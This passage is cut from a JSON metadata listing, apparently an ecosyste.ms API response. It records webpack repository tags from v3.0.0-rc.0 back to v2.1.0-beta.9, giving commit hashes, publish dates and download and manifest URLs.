rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1